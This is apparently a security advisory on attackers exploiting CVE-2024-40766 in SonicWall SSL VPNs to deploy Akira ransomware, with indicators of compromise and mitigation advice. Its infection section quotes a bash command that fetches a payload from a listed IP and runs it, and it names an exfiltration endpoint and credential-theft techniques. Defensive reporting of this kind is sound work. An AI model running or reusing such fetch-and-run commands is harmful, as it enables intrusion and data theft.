In mid-2025, cybersecurity researchers observed a resurgence of threat actors exploiting known vulnerabilities in SonicWall SSL VPN appliances to infiltrate enterprise networks and deploy Akira ransomware. Beginning in July, multiple incidents were reported across North America and the EMEA region, where attackers leveraged unpatched SonicWall devices to gain unauthorized access.
The primary vulnerability exploited was CVE-2024-40766, an access control flaw in SonicOS versions up to 7.0.1-5035. This flaw allowed unauthenticated remote code execution, enabling attackers to bypass authentication mechanisms and execute arbitrary commands on the affected devices. Once inside the network, adversaries conducted reconnaissance, harvested credentials, and moved laterally before deploying the ransomware payload.
By August, the frequency of these attacks increased, affecting organizations in sectors such as manufacturing, education, and healthcare. Attackers often exfiltrated sensitive data before initiating encryption processes, transferring files to external SSH endpoints prior to deploying the ransomware.
Analysts identified multiple indicators of compromise, including unusual DCE-RPC requests to the epmapper service and unexpected WinRM sessions to domain controllers, occurring well before ransom notes were delivered. These early signs were linked to the broader Akira ransomware campaign, facilitating rapid incident response and containment.
Akira ransomware, first detected in March 2023, has evolved to target both Windows and Linux systems, including VMware ESXi hosts, enhancing its disruptive potential. Operating under a Ransomware-as-a-Service model, affiliates employ double-extortion tactics, encrypting file systems and threatening to release exfiltrated data publicly.
In each SonicWall SSL VPN compromise, attackers maintained persistence by reusing stolen credentials and exploiting misconfigurations in Virtual Office Portal setups. This approach allowed them to bypass multi-factor authentication configurations, even on devices that had been patched.
Infection Mechanism:
The initial compromise typically began with the exploitation of CVE-2024-40766 in SonicWall SSL VPN devices. Attackers sent crafted HTTP requests to the vulnerable `login.host` endpoint, effectively bypassing authentication controls. Once a foothold was established, a malicious payload named `vmwaretools` was downloaded from a hostile cloud endpoint using a simple `wget` command:
“`bash
wget http://137.184.243.69/vmwaretools -O /tmp/vmwaretools
chmod +x /tmp/vmwaretools
/tmp/vmwaretools
“`
This payload installed a loader that registered a backdoor service and harvested administrative credentials via Kerberos PKINIT and UnPAC-the-hash techniques, extracting NTLM hashes without triggering standard credential audit logs.
After credential extraction, operators initiated lateral movement to ESXi servers over RDP and SSH, exfiltrated data via SSH to endpoint 66.165.243.39, and then executed the ransomware binary on Windows and ESXi hosts.
To maintain stealth, the loader disabled local logging and leveraged legitimate administrative tools such as WinRM and Rclone for intra-network communication. By the time encryption began, attackers had already ensured persistence through backdoored services and stolen credentials for future access.
Recommendations:
Organizations are urged to take the following actions to mitigate the risk of such attacks:
1. Apply Patches: Ensure that all SonicWall devices are updated with the latest security patches released in August 2024 to address CVE-2024-40766 and other vulnerabilities.
2. Enforce Credential Hygiene: Implement strict password policies, regularly update credentials, and monitor for unauthorized access attempts.
3. Monitor Network Traffic: Keep an eye on anomalous external SSH traffic and unusual DCE-RPC, WinRM, and certificate download events, which can serve as early indicators of compromise.
4. Restrict Access: Limit access to the Virtual Office Portal and other critical services to trusted IP addresses and enforce multi-factor authentication where possible.
5. Incident Response Planning: Develop and regularly update incident response plans to ensure rapid containment and remediation in the event of a security breach.
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can significantly reduce the risk of ransomware attacks and protect their critical assets.
